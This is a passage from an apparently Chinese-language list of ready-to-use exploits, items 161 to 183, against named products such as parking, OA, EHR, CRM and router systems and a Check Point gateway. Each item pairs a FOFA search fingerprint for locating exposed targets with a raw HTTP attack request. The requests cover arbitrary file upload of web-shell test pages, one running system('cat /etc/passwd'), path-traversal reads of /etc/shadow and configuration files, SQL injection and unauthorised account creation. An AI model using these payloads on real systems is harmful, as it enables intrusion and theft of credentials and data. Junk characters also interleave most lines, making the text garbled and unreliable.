User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
; k0 }/ |. P& l9 y& Q2 q6 R' ]Connection: close
+ P9 z+ f' ?8 n. z8 n" b0 Z5 U6 u: u. H1 rAccept: */** n! S3 S& p; `. j7 {
Accept-Language: en9 @2 T4 {2 ?: L4 L3 V, a' g
Accept-Encoding: gzip
5 B2 Y' O2 |) i. @7 k0 E5 J5 v$ k# G0 ]

; y, E7 C: B7 w1 Y8 H! s161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传% Q% P2 }6 k$ ~& ?/ |$ M
FOFA:body="/KT_Css/qd_defaul.css"
4 a7 O. n; k" [6 O, _3 z第一步,上传文件<fileName>字段指定文件名,<fileFlow>字段指定文件内容,内容需要base64加密. B% E) l+ h) b* ]) W
POST /Webservice.asmx HTTP/1.1
/ t; B4 s% u; Y! N* NHost: x.x.x.x% V; p% y  W1 K# p+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.366 W- _. g& u1 {) @
Connection: close
3 s2 y4 [& T/ l6 i# r$ JContent-Length: 445
; p/ N) U  b* mContent-Type: text/xml5 c, Z2 \4 d- i' S/ n
Accept-Encoding: gzip
8 Z; ]# F. r2 \; M! s7 h' w" p# r, E: n
1 k/ Y  M* K+ b<?xml version="1.0" encoding="utf-8"?>
. R: i* o- W4 Z$ |<soap:Envelope xmlns:xsi="
& S* ]) B/ u" z& M5 Whttp://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
8 w* r4 k& \1 Z) Q( pxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
# ]5 o  ^# d. @. e<soap:Body>
8 h8 R6 K: j& Q<UploadResume xmlns="http://tempuri.org/">
1 k' f" N3 I: t* a! O0 d<ip>1</ip>
2 A5 ?9 b' s6 A9 _1 O! |0 d( D<fileName>../../../../dizxdell.aspx</fileName>9 Z& e2 h* T& _8 g
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>+ H0 p; I  g; j+ s
<tag>3</tag>7 w& Q  ^1 D+ m
</UploadResume>" I' p  D# C' |/ T2 V% i) q" ^, r
</soap:Body>
8 _( l* d5 W. V, V/ r3 Q</soap:Envelope>8 V4 w0 s$ H- G8 N9 [  p
* V. r/ r" B% \+ ~/ a2 I7 C

6 t& ]1 Q& E/ B' J, L8 vhttp://x.x.x.x/dizxdell.aspx$ ]# ]/ x& |9 \8 \+ k) d

7 r: M+ u, h( v162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传" Z+ n* W' {+ F0 {" a4 {! ^% {
FOFA: app="和丰山海-数字标牌"
6 n* Y6 e' x9 v0 |" n: x7 y0 [: j. ?POST /QH.aspx HTTP/1.1# r6 l  m8 B' p4 _5 G# y
Host: x.x.x.x
/ R' e6 ?' E5 ~9 ?1 JUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
/ c! e0 V+ o' `! L" HConnection: close( S# \' O0 ^" G5 t# @
Content-Length: 583, P$ h9 E& w1 R5 H
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey$ I# P* ^0 B4 {4 ?0 q+ I( z6 R
Accept-Encoding: gzip
9 c$ |! v  D4 B4 i& [, x+ W5 @3 ]6 g+ |6 z7 Q
------WebKitFormBoundaryeegvclmyurlotuey$ T8 f+ U5 y+ L1 p- g
Content-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx"* o: c. [. @% Q( ^* O- Z3 S
Content-Type: application/octet-stream
/ D5 P0 R% o  c3 H  |
+ Z# X  k7 L6 I: Z' z<% response.write("ujidwqfuuqjalgkvrpqy") %>" y6 l8 x3 D2 P2 i$ h
------WebKitFormBoundaryeegvclmyurlotuey
) [% R8 v* T9 P/ ]2 D9 A1 vContent-Disposition: form-data; name="action"* V" V/ _# J, T4 A- J1 B9 m4 a
9 Q( {3 I& k3 Q1 {6 b
upload* h6 K# K! r6 }' h' Y* A
------WebKitFormBoundaryeegvclmyurlotuey
* q, I3 J4 v( I5 o" _0 B0 e* PContent-Disposition: form-data; name="responderId"; N$ \% ?% N  p3 b
" ^, C4 S' i( J9 ^" @9 w' x6 [0 m# {
ResourceNewResponder
9 h6 b. ~" p4 ^! p, _) P------WebKitFormBoundaryeegvclmyurlotuey
. p2 [$ |+ g5 k" ]5 V, L" r. [- KContent-Disposition: form-data; name="remotePath"
3 k- [4 F0 {' H& M. D; O( }+ Z' T+ L! s: D4 h8 x+ b2 z( }! \
/opt/resources, D4 Z8 `7 U9 `; M; p, U+ Y
------WebKitFormBoundaryeegvclmyurlotuey--' V3 l" P- H1 S3 U. C
# s% X$ g" x& L4 ~2 h# K
) H- n8 s7 J: v- O9 c/ ~/ p+ ?
http://x.x.x.x/opt/resources/kjuhitjgk.aspx  d- O" U/ F+ i! u, \$ ~" E
0 A% F. {* z- q7 H! ~* Y5 _+ D
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传
. h6 z0 W# X& }/ ~( i! eFOFA: icon_hash="-795291075"' V8 u1 f/ a& S, V/ M
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
7 K5 \- L' S# ^' }0 A1 Z  kHost: x.x.x.x! @. v6 b8 k) S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
2 x5 h! G0 V- bConnection: close7 w2 z1 L# p- {8 z
Content-Length: 2931 o4 G: q* N% ]7 e' p) i# e( J
Accept: */*
0 l7 Y! e" k6 q* q4 [& YAccept-Encoding: gzip, deflate
- q8 y" x% r/ d. pAccept-Language: zh-CN,zh;q=0.9
# s  U( }* o& `( ~6 EContent-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod
: D. \% C; W+ K2 Z, g) I6 O' u' y$ x8 m2 H
------iiqvnofupvhdyrcoqyuujyetjvqgocod& p) A- W) B* @, m
Content-Disposition: form-data; name="name"# I1 _, e  W, g

: Y/ m. p8 w: U# q5 `# p. o3 O1.php# U1 J8 n5 I' ], d
------iiqvnofupvhdyrcoqyuujyetjvqgocod
# G1 Y: |* V  C2 W5 uContent-Disposition: form-data; name="upfile"; filename="1.php"( {9 a7 }2 A# H) r3 g' ^/ O
Content-Type: image/jpeg( P5 j4 E* S# k' I7 p

# H+ Y. |& y% }9 Brvjhvbhwwuooyiioxega1 R4 s# }) u7 X5 r8 n9 F
------iiqvnofupvhdyrcoqyuujyetjvqgocod--
+ n5 \6 Y: g8 F' C. H) y
* k: @! ~9 H8 \0 Z- w
$ K3 T1 ~; ]$ S2 s, D164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传. ]0 y  Z  X. N3 G1 }
FOFA: title="智慧综合管理平台登入"1 i" X- o1 I" O& Q8 R
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.18 x6 W" O$ \& F- g* x9 y' F
Host: x.x.x.x' r% }. A+ r( ?# p4 ~" k2 R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
- I" O/ O" L0 L* C7 cContent-Length: 288
7 b7 T) l& P9 E* s5 qAccept: application/json, text/javascript, */*; q=0.01
0 }% L) i& s; E! UAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,. E. e& {* r9 z7 U8 _1 ?$ x' Z( K
Connection: close! \3 g) k2 R; z) H, Y7 m, i, F3 i
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
, q' i1 c8 V2 p$ V* Z2 v! ?1 TX-Requested-With: XMLHttpRequest
& c& o: u/ h6 s* _0 WAccept-Encoding: gzip
' i0 x3 x9 s' Y, @8 T6 V. Z8 P' {6 f) H9 u
------dqdaieopnozbkapjacdbdthlvtlyl+ N& u2 k# ]. S5 _6 a
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"& |+ N1 p% F) d5 r! I8 W' l* u) g
Content-Type: image/jpeg" }. H2 B- t: p( a+ T# j" {
; _& c/ C  P+ V  B! v- [
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>9 g# `. {6 r5 L
------dqdaieopnozbkapjacdbdthlvtlyl--. E* I+ T  c* Y; {
* F, n7 q! {2 \
8 Q7 c$ l4 u' r6 Z3 z
http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx" q% b" a) h( s2 q
* U. p  ]. U8 ?* r, h; ?# |6 G. m
165. OrangeHRM 3.3.3 SQL 注入/ n, P( p6 O. x. @
CVE-2024-36428
! L0 o, |3 q" [1 KFOFA: app="OrangeHRM-产品"0 u2 e4 S- x9 M+ ^+ a5 F! I
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))3 @: P6 @6 R. |, R

7 h6 J0 P, L6 v9 n$ z/ D7 l7 K4 z, V4 q) _& X/ e, x! H% k
166. 中成科信票务管理平台SeatMapHandler SQL注入
! v1 x; l" T* J! S2 y9 D) PFOFA:body="技术支持:北京中成科信科技发展有限公司"
1 c& t% p4 M( C! v2 h7 }& FPOST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.14 C9 L5 B* W( R" G0 j2 M
Host:( O5 k: s2 T9 ?- l% f* R5 ^9 `
Pragma: no-cache
' t( Q. B0 ]6 s* QCache-Control: no-cache
! [8 E# `- S0 f9 A+ bUpgrade-Insecure-Requests: 1
' T$ T% T* B0 Z' w! ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36, {# n% \& J2 b- H7 I- U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% ~' P: r( p9 Z, i/ g: vAccept-Encoding: gzip, deflate3 _: f# I2 @: S) Y! g
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
8 b/ C2 n/ N1 t* UCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
( C8 I- Y, U8 U4 ZConnection: close
3 \4 r. n4 ~0 O7 ~0 j7 l9 CContent-Type: application/x-www-form-urlencoded
9 {' Z9 B) |  e, `+ M9 {( x2 k. jContent-Length: 899 W7 l  e- T0 @8 L* o: n9 C  ]
; \/ Q8 m% `4 Y, W. v( N9 ?& ?
Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE) Q7 G- a7 n0 p/ o2 j: n

# q/ _* d, n! Z( }
7 E- f1 n, Y0 r167. 精益价值管理系统 DownLoad.aspx任意文件读取  i2 i+ A: p+ c& ?9 G! n
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
, t1 m$ m& G: l8 Y5 b* Q* n0 RGET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
9 v, G1 }  f( H4 ?/ |Host:
) M5 H5 U; c4 q8 e/ d5 C$ h9 ]User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36; Q8 ~$ k  z: a1 I
Content-Type: application/x-www-form-urlencoded$ H' K: O9 y6 g
Accept-Encoding: gzip, deflate
" _9 O. z8 `: H% j) R8 @8 C( MAccept: */*
+ x( s; i4 V1 B" V2 j+ WConnection: keep-alive
7 w$ o8 w. U7 e, G1 Y
( L- _2 z+ B$ Y6 R& y4 b: R9 h: @4 @) k& |) \. O  J2 H
168. 宏景EHR OutputCode 任意文件读取
  L& c' A& M% t9 d) iFOFA:app="HJSOFT-HCM"
$ v+ r- b  L* @  p6 L/ X& ~2 A2 [1 gGET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.11 H4 x4 f% H' \: m
Host: your-ip
: j# Z+ G0 W& W/ P5 T& L1 oUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
7 \+ x5 h3 z) z0 `Content-Type: application/x-www-form-urlencoded' }1 ~9 a3 Z: a4 @
Connection: close. {0 x7 I8 d6 ?- \2 z
/ o- A( V6 j2 X( [, \+ d3 t

+ o; ?7 d+ D# j1 @7 [; y+ R/ E7 F  S  V% ~
169. 宏景EHR downlawbase SQL注入
3 O  C0 I3 l* @* h# L) V/ ZFOFA:app="HJSOFT-HCM") {$ [# S# u; p
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
! N* F: A8 n$ _! |9 y# JHost: your-ip
" Q! V4 ?: T9 Z* N% Y* ~4 _8 QUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 z6 {! f$ j/ j+ iAccept: */*
, b& B0 P! U9 LAccept-Encoding: gzip, deflate' R/ a; F0 v. ]* h
Connection: close
5 B9 r, }% g1 W+ \8 a- V5 l4 v/ _2 o. w+ p4 [. W# `
: O1 E! C( o4 j" U9 Z  n; [0 l; S! u
# g* r# d0 Z, B4 K
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
& F# o0 N: C" \# y  RFOFA:body="/general/sys/hjaxmanage.js"
- H, S: Y: l7 h/ M2 ~" L$ ePOST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
+ \6 a$ S; `/ Z8 G! g& z* HHost: balalanengliang
$ H- A/ `  D# {* V5 B+ p, XUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
2 J! n# T' ?; u. p& z# B5 c$ _Content-Type: application/x-www-form-urlencoded; }9 u; N2 n) f* A
& J9 k, h9 r; y4 P
filename=../webapps/ROOT/WEB-INF/web.xml
: o& z. x5 O/ D( v5 I" j9 ^. G* M+ y! _$ H

5 W" H2 _% A( g7 w# A, V171. 通天星CMSV6车载定位监控平台 SQL注入
8 B& Y0 u9 d- M" L- A& wFOFA:body="/808gps/"5 I" K- }  u7 P# j. O
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.15 L! V2 T7 F3 {0 T2 O
Host: your-ip0 ]: P- k/ [, N% j; l7 Z3 Q
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0/ S, v; ?  C5 \( u: z" b& l' v
Accept: */*# N( m9 w8 f% S4 o; N  I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2" X6 c0 X+ O8 g  u1 j
Accept-Encoding: gzip, deflate8 Z5 b# j" x( c" T1 D7 M; ?, }, L! v
Connection: close
9 a$ Q2 o# k; e
5 r8 ?2 a$ [9 V
8 s4 l0 F2 n8 {5 a2 K( h8 I2 J0 t
3 |* C2 `8 \" i# p- c172. DT-高清车牌识别摄像机任意文件读取. j7 A/ [* m7 x- T3 o
FOFA:app="DT-高清车牌识别摄像机") Q  V3 O, c  }8 e0 T
GET /../../../../etc/passwd HTTP/1.1
' L/ Y5 \- c/ g; ?  mHost: your-ip, C7 l+ d' H* u: L2 c7 @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
" J5 Y' r: Q6 y5 \+ k' ?/ |& fAccept-Encoding: gzip, deflate. l' P' J4 T" g, }; s
Accept: */*
) S3 g' [: D' Z, [0 OConnection: keep-alive
1 t7 b) H4 m2 T, p% q9 l: @  R* W# ~1 E

8 V& n* m& R( a1 S( Y7 l1 [) s7 C& x7 U. d
173. Check Point 安全网关任意文件读取
. Q0 C* R; s- e  m# m  iCVE-2024-249197 ^1 ?7 z! D8 F. Q. e4 Z0 `
FOFA:app="Check_Point-SSL-Network-Extender"
( u/ v& G& X4 \4 J( f2 U0 Z) s) o% wPOST /clients/MyCRL HTTP/1.1
& U' X6 \' n+ ~( j# CHost: your-ip
7 ~4 m% f; U2 M5 B- l  z2 OContent-Type: application/x-www-form-urlencoded7 D* l8 f. n6 U( a1 N- d% f

6 j9 _+ c! w/ N) _  zaCSHELL/../../../../../../../etc/shadow
2 a  z8 x4 U# M1 g: J
+ f) m( {- V4 q, o7 X1 g4 t; M( {( A( C% Q4 g+ X" I% k
8 g6 i0 c( m9 u) z7 b
174. 金和OA C6 FileDownLoad.aspx 任意文件读取
% ?8 G) }/ Z% b! b% ?FOFA:app="金和网络-金和OA"
- I+ L+ \% C3 }GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1* X' O  z. P/ i
Host: your-ip: V, `" B4 P6 y: ^' s
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
0 [' |0 z% O8 ^- N- J7 S9 B  LAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.76 ]) R; _2 @, F: S+ E$ Z, l. u
Accept-Encoding: gzip, deflate, br
" F1 d( B9 k) k4 W0 A3 s- ^( S" _1 \Accept-Language: zh-CN,zh;q=0.9' u6 }, }, ?" j( G
Connection: close
. @. C2 Z7 K; _
# D) ~/ s) r/ r. f6 x- @% s. h6 ^4 e/ ^

6 i0 E- r, t& m175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入$ o. e8 {' y5 c# ?! X/ C) h
FOFA:app="金和网络-金和OA"
* N6 {" f, U; o7 J! S, [, B4 yGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
& y" i- i. {, H4 @Host:# C4 |6 d: @( q4 Y% j9 G
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
' M1 M7 v2 \  n3 P6 z$ M+ ?Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8( w: C! E. S, O7 J: \
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.27 S. Q! A: a) Z3 ^
Accept-Encoding: gzip, deflate1 G& e9 J3 J2 z' w9 @9 H; v) l
Connection: close3 d* X% Q, _' B9 U2 i3 f+ x- m% e, i
Upgrade-Insecure-Requests: 1
( N% b/ d2 B* x& q. ~7 ]% R& L- y1 l3 h2 k/ {6 G0 l, O, {
4 d% r5 r1 l5 V+ q4 N* s0 T
176. 电信网关配置管理系统 rewrite.php 文件上传8 N; q# p0 I: ]- f0 D
FOFA:body="img/login_bg3.png" && body="系统登录"
5 p  x$ V9 a- sPOST /manager/teletext/material/rewrite.php HTTP/1.1
5 j7 \3 }& {5 z0 a8 p  h! lHost: your-ip6 D! x& b- x4 {; @' [# O# c$ O* O  w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
, v& g/ N" E# oContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
* H0 l6 m! i( c' H! i8 {+ s4 UConnection: close% U: l' z1 I6 S8 S3 }
+ w6 B: h" @% k4 g
------WebKitFormBoundaryOKldnDPT
  v+ C6 {! u& C% `3 FContent-Disposition: form-data; name="tmp_name"; filename="test.php"& f/ F8 I8 e0 O- ^0 W7 Q
Content-Type: image/png
4 c$ M" M0 ^. f3 z$ Z
% \3 d( O5 N( N1 _) C<?php system("cat /etc/passwd");unlink(__FILE__);?>
& o4 ?: A; w: d, c- ^- H; V, A' W------WebKitFormBoundaryOKldnDPT
1 o  d, W" _4 n5 ~4 NContent-Disposition: form-data; name="uploadtime"8 G$ x% J" U8 p" o. E8 M

3 H, Q. A# ~3 k: e" a  r- o! `. e6 | : v/ D$ q2 Y, @9 A; f. z' ]
------WebKitFormBoundaryOKldnDPT--
  @7 p6 r/ _& S0 `3 Q
5 v, `  [. J3 p; G. N9 m/ N6 Q$ D2 O9 q# ]& Q

' y' `9 c$ n. S" L3 ^177. H3C路由器敏感信息泄露1 Q& [! A5 e% K) [
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
# i3 e# L5 Y+ t8 F5 |- V8 u: q, ?/userLogin.asp/../actionpolicy_status/../M60.cfg7 l" D6 \- C% i2 o6 Z4 N* R/ Q
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
" b) ?2 |1 r1 t7 x" H3 y+ j/userLogin.asp/../actionpolicy_status/../GR5200.cfg
1 O6 [* o; F! F7 ^/userLogin.asp/../actionpolicy_status/../GR3200.cfg  s/ c6 `, I! m6 J- m/ H: Y
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
$ n9 u. \$ H# ?. Z3 T/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg* b- ]& E9 E8 L9 `% k; S
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
- }3 f1 R: r! I8 o) P$ w; v$ X/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg% ]" ]% W: U7 `& Q
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg" F8 Y2 t# [! ?. V- e; w3 @
/userLogin.asp/../actionpolicy_status/../ER5200.cfg* q9 G! \3 c& M! T
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
, a9 V4 z8 P) g0 d" A* {) n* R6 o' P/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg" Z: q* J# t( n- O) w: I" S
/userLogin.asp/../actionpolicy_status/../ER3260.cfg: \5 ?) v/ L: Q5 ~$ c0 @; P" {
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
& A4 M0 d7 m/ Z; R/userLogin.asp/../actionpolicy_status/../ER3200.cfg
0 ]$ E+ q0 V7 [; T1 t/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg0 d) X' `% q2 g# \% n5 A/ C
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg8 Y1 Z4 h% S1 d
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
3 k! a, Z% \2 a" l9 x' _/userLogin.asp/../actionpolicy_status/../ER3100.cfg2 o& p9 ]4 F* D3 p' o" B4 j* n
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg1 `; \" L: C& V. a: W

! f: E4 o) l6 q; V: s8 H( j
! P% K/ d# p& H" n( _( l+ H% F4 A178. H3C校园网自助服务系统-flexfileupload-任意文件上传
" i  w5 x9 b& k8 ~FOFA:header="/selfservice"
, P5 L; |% F, Z# EPOST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.11 y& D0 e4 k5 \2 d3 {
Host:% \& T3 p5 G. O8 J7 [: t6 s- p0 D
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
/ Q( N5 U0 y' t) C* k! |Content-Length: 2520 d6 X* K- T% T; M8 n
Accept-Encoding: gzip, deflate
3 m8 q: d8 J3 Q+ x( n/ rConnection: close9 S! Q2 ^: i% K) V1 g6 E. A
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l7 {/ |* ]5 L1 K
-----------------aqutkea7vvanpqy3rh2l
" U# G1 V' X' v0 j, W! ?0 ]5 S, `  RContent-Disposition: form-data; name="12234.txt"; filename="12234"
  K" |+ y+ O" G) jContent-Type: application/octet-stream
9 g% k: J; M) G( ?* Q9 g2 e  y8 S/ G. zContent-Length: 2550 K" Y( a; q4 R% F
; r/ Q. T+ w! {6 M- Z
12234+ g3 x% }+ \, @  G
-----------------aqutkea7vvanpqy3rh2l--
) D% t7 b5 O0 m" Q$ D4 q2 Y# [6 z$ L: S: o

# q2 z: b/ a2 n+ YGET /imc/primepush/%2e%2e/flex/12234.txt
3 q* }6 [* n  P# X, }
  |1 B: [  S  [0 e$ d" P
7 M$ k- I/ l8 F) P179. 建文工程管理系统存在任意文件读取4 H) b; G0 T9 k$ N+ |
POST /Common/DownLoad2.aspx HTTP/1.1) p# p! R2 T* C) [6 |, ]
Host: {{Hostname}}; n  k2 o8 Z1 O: r' y0 M
Content-Type: application/x-www-form-urlencoded
" y+ ?4 H8 g* f/ q- q3 W" }User-Agent: Mozilla/5.0
  ?2 Z2 E( U: y5 ^' F
  u- x  y# t! opath=../log4net.config&Name=: q( M  K2 r. K+ w

/ X5 z2 ^/ s6 Y; S: }
8 t( T9 C& g/ c6 b180. 帮管客 CRM jiliyu SQL注入8 D$ b& g) B' |- W4 {, [: o7 ^
FOFA:app="帮管客-CRM"4 ^* s, e9 v- g* p) r- @/ G1 a
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1  U+ `; d/ p; j/ w4 A* C8 x# |
Host: your-ip
- b% l7 B9 J4 R4 c" GUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
8 r8 Z2 l" b/ u/ n0 R) F7 PAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
9 ]: b) p, I; L/ S4 g  f2 P/ V' g: tAccept-Encoding: gzip, deflate
( O. {2 ?9 u" G/ W1 Q2 K& F# m- x$ fAccept-Language: zh-CN,zh;q=0.9# F8 ]' y+ p1 i1 |$ P
Connection: close" Y9 A1 `2 g% a! y" J( j; Y' Z4 R

- }7 ^+ t& U3 m8 V& u+ a& }' S2 A0 V  d0 ~7 g1 l
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入3 G; I7 b& a/ O! i( t: B: r
FOFA:"PDCA/js/_publicCom.js"
! z! v: b3 f& sPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1; q( g) ?5 N' x% z0 Q: Z' v1 A8 }
Host: your-ip
; V9 T* G$ z2 L, x: ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
' A4 E) g2 r7 A4 }+ O( X& D# N) ]4 zAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ P6 ?& [  F, xAccept-Encoding: gzip, deflate, br
( |3 r, E+ V2 yAccept-Language: zh-CN,zh;q=0.96 v& {" m& j5 V* {8 j& A
Connection: close9 |( U- {2 ~/ J" C
Content-Type: application/x-www-form-urlencoded# N" U$ `9 q3 W2 V* M$ h

* A5 k" R  k* a0 \  L
" s9 M) [! X# `7 t& h3 |1 _7 |action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=207 L& D$ r( u7 h: }8 o. N* L. T4 i4 {

: ~( O1 U' [) h3 |
( j+ `. i$ F" L7 P9 o182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建* n0 q1 y6 J. L6 x' E& R) a3 V& p
FOFA:"PDCA/js/_publicCom.js"
; u& l, u! T; {* J; Y3 x( ^5 MPOST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.14 ]+ q- H0 F: y4 _
Host: your-ip- R5 `; Y( g& r! M6 I. H( j3 j/ X
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; d6 o, M+ T9 e0 rAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# W1 _. J; ?6 F. Q# w$ Z/ g
Accept-Encoding: gzip, deflate, br
( y" r2 h5 ?& x2 I2 y/ |, gAccept-Language: zh-CN,zh;q=0.9" h0 s* f7 |8 ^1 [$ p+ w
Connection: close
. G* P8 |/ X" x8 YContent-Type: application/x-www-form-urlencoded  d3 z& A" G) ^. @% K

( f8 ^( Z% r: h$ g9 y9 D: D& g8 I9 T- ?* k; s6 Z
username=test1234&pwd=test1234&savedays=1
: V6 C% a: G+ ~) V, y& {$ `; H7 _. n2 u, W

. k3 k) E3 W! t2 l9 U0 C183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入* f9 j2 ]! C. v: H
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"2 S% T! j) ~3 n0 z2 Z
